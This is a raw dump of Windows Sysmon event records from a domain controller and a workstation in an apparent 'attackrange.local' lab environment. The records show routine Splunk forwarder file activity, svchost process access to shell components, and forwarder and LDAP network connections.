AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=060421F29D5B1B39F322F1D74C722651,SHA256=DBFF7107FBE9DF470D0331281539BEA68EDA0D8EA1EB85F2D3E4F7ADAD2E71BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638840Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:39.021{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=825CD49E4FC7EA155FEF4DD5053499B9,SHA256=AF46DDA4FFE751510DC58E70456C21C67582FF5E4F889045BE983D28F15350A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918662Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:40.873{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=320902E614542DBB58B5D22734FF4694,SHA256=F88980270F0ADBC8817182593180B1251FD7AFF0DC8F87D27B6F6E9418C6CC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918661Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:40.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918660Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:40.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918659Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:37.795{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1060-false10.0.1.12-8000- 23542300x80000000000000005918658Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:40.132{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FBBB1647BECFD587437B858935A23E0,SHA256=7EA30E4F5A8F32FE20589BA47D78A61FEB4EC702355025591E79152E7257BF85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918657Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:40.131{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7D488BE293D4342058E380FBCEE182E,SHA256=566BCF235B7229C4820F0C33BD342D879023D10B2E2C869EE4529D49A0151612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638842Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:40.037{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D187951C1C95AC19F7FBEE7FC3CE099,SHA256=C63B3CB65B8B19A69783C3BD70BAB0A2EE00E941EEF7CED1F13C73C66F8504F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918665Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:41.876{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46EE7F752B7554C53BC27959A9D848A4,SHA256=DE6114F10A25C86D632C02D99854316E3E97754FAEB2C8B1B6DFBE6DD7A0B692,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638846Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:37.394{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57276-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638845Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:41.162{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8B604B04B1352237D82BF29F44E7E6,SHA256=DEEA1DF00013B307096161019B9FD0D50C4635408953A9037B31C5269EC966D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638844Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:41.162{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8A3CAB9AC304FE5CE6EB6F81EE2B0F0,SHA256=52517FDCCC64C49694F93F3A94A865DA9BDBC64B5440518FA5733A3BCD8480E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638843Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:41.053{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB7FC0F569379A27656E15AC5E6C3B1,SHA256=E4A3A21838F28EF38FE7ADBBEE03E734573C81EFFCE8E19C05EFA5716DE0C39C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918664Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:41.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918663Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:41.762{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918668Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:42.891{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2454D98570933E4C4B6C138DBCAC6E0,SHA256=A4E7264262625D559F115664D6F19112C9A406B197FD8D019976DDDE975FE010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638847Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:42.068{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C83A6C30566F8CF420ECE540BD3377D1,SHA256=DC8D0D77CF85912F274A1BED20AF1C4C4D5EAF01E76C2531831DF6F1121B6BD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918667Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:42.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918666Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:42.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918670Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:43.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918669Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:43.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638848Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:43.084{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F94998844195866D05EC43F40C5513,SHA256=E7022BFB331B8B06F1450B7416303EDF62037C4B2A8864888EA32F7CBBB2E518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918674Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.886{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FBBB1647BECFD587437B858935A23E0,SHA256=7EA30E4F5A8F32FE20589BA47D78A61FEB4EC702355025591E79152E7257BF85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918673Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918672Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918671Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.114{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43A2B9C8B8A211DC1170BE29EF71064F,SHA256=8F04A0636061C678FA07A2FB38503FD3F9FADB397CB11CE6EA486725F9F2A36C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638849Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:44.100{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66E90F45A3FFB84B351BDEC8E57A9D70,SHA256=30F6C4E55341320FB426016C250F9672A07D16865D4190E55272DBA85B42E684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638850Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:45.115{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0DB88DAE0F4DADB196D28BFA559E5B,SHA256=A5956BB4774D5F45EED3BE092E018F6C1AFB5ED3FD77232DDC99B1984B6B579D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918677Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:45.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918676Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:45.763{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918675Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:45.214{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED852EB047F77546A784665EDCDF6C80,SHA256=19A271DB4B57C298C3E68FAF5D006F3D03AA0870BEB59758CD5D37EFAD50A40C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638854Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:42.456{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57277-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638853Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:46.271{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8AF1241D064348401DF15B4AD1BEA890,SHA256=CB263C75B13D0EDFA63D40B4D83625385DC847234B9DB7414B6AE53C51016042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638852Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:46.271{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F8B604B04B1352237D82BF29F44E7E6,SHA256=DEEA1DF00013B307096161019B9FD0D50C4635408953A9037B31C5269EC966D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638851Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:46.131{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2B7D0F76A907856C0010F8BCBA8C8B4,SHA256=81588FA640E6A447F49B95139EA1867A5C982A7AF54FB73541B4988F1E1C5662,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918684Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.016{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1062-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918683Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:44.016{896A638B-B5DB-6058-2A00-00000000AE01}3044C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1062-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918682Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:42.929{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1061-false10.0.1.12-8000- 10341000x80000000000000005918681Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:46.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918680Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:46.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918679Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:46.344{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBC5836041C26DC167A0F43246B4E83B,SHA256=CBF7E6A2C3A38D72FF8F1E122AC5ECA3BFE127A5DFBAA6F2651B1511B1488061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918678Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:46.227{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A10EC7BD43DE01704AA4934C4FB2030,SHA256=703AD1496B611B5D6216CDBDB53D5F1F404569B2EA94540A9EEF6EA05C2FA9ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918687Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:47.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918686Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:47.764{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 